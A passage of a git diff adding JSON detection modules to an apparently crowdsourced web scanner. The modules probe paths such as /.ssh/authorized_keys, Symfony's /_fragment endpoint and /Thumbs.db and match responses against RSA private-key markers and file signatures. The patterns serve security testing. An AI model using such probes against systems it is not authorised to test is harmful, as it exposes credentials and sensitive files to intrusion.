+				"pattern": "\"loggers\""
+			},
+			{
+				"type": "static",
+				"pattern": "\"profiles\":"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/ssh-authorized-keys-disclosure.json b/modules/crowdsourced/ssh-authorized-keys-disclosure.json
new file mode 100644
index 0000000..e419379
--- /dev/null
+++ b/modules/crowdsourced/ssh-authorized-keys-disclosure.json
@@ -0,0 +1,20 @@
+{
+	"request": {
+		"paths": [
+			"/.ssh/authorized_keys"
+		]
+	},
+	"response": {
+		"matchesRequired": 2,
+		"matches": [
+			{
+				"type": "static",
+				"pattern": "-----BEGIN RSA PRIVATE KEY-----"
+			},
+			{
+				"type": "static",
+				"pattern": "-----END RSA PRIVATE KEY-----"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/symfony-fragment-exposure.json b/modules/crowdsourced/symfony-fragment-exposure.json
new file mode 100644
index 0000000..c394b62
--- /dev/null
+++ b/modules/crowdsourced/symfony-fragment-exposure.json
@@ -0,0 +1,25 @@
+{
+	"reference": "https://www.ambionics.io/blog/symfony-secret-fragment",
+	"request": {
+		"paths": [
+			"/_fragment"
+		]
+	},
+	"response": {
+		"matchesRequired": 3,
+		"matches": [
+			{
+				"type": "status",
+				"code": 403
+			},
+			{
+				"type": "static",
+				"pattern": "AccessDeniedHttpException"
+			},
+			{
+				"type": "static",
+				"pattern": "FragmentListener"
+			}
+		]
+	}
+}
\ No newline at end of file
diff --git a/modules/crowdsourced/thumbs-db-disclosure.json b/modules/crowdsourced/thumbs-db-disclosure.json
new file mode 100644
index 0000000..5ca243e
--- /dev/null
+++ b/modules/crowdsourced/thumbs-db-disclosure.json
@@ -0,0 +1,16 @@
+{
+	"request": {
+		"paths": [
+			"/Thumbs.db"
+		]
+	},
+	"response": {
+		"matchesRequired": 1,
+		"matches": [
+			{
+				"type": "regex",
+				"pattern": "\\xD0\\xCF\\x11\\xE0\\xA1\\xB1\\x1A\\xE1"
+			}
+		]
+	}
+}
\ No newline at end of file